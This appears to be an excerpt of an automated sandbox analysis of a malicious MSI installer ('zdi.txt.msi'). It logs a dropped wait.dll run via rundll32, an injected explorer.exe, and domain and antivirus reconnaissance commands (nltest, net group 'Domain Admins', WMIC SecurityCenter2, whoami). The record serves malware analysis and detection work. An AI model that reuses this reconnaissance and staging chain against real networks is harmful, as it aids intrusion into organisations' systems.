Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 55FA980756605C03F579DEFA7A4ADAF1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI48D4.tmp "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll

Source: C:\Windows\Installer\MSI48D4.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: zdi.txt.msi

Static file information: File size 2254336 > 1048576

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr
Source:	Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmp, wait.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr

Contains functionality to dynamically determine API calls

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D89E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_0B8D89E4

PE file contains an invalid checksum

Source: wait.dll.1.dr

Static PE information: real checksum: 0x1d7e57 should be: 0x216e55

PE file contains sections with non-standard names

Source: wait.dll.1.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3323C push ecx; ret	3_2_00C3324F
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358C1 push eax; ret	3_2_00C358C2
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358C4 push edx; ret	3_2_00C358C6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358C8 push ebp; ret	3_2_00C358CA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358CC push edx; ret	3_2_00C358D6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358D7 push esp; ret	3_2_00C358DA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35881 push ecx; ret	3_2_00C35882
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35884 push ecx; ret	3_2_00C35892
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35893 push ebx; ret	3_2_00C35896
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35898 push si; ret	3_2_00C3589A
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358A0 push ebx; ret	3_2_00C358A6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358A9 push esi; ret	3_2_00C358AA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35863 push esp; ret	3_2_00C35866
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35860 push edx; ret	3_2_00C35862
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35869 push edi; ret	3_2_00C3586A
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3586F push ecx; ret	3_2_00C35872
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35875 push esp; ret	3_2_00C35876
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35879 push edi; ret	3_2_00C3587A
Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_0000023CDA650105 push ecx; retf	5_3_0000023CDA65010E

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSI48D4.tmp

Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Drops PE files

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI468D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\wait.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473C.tmp	Jump to dropped file
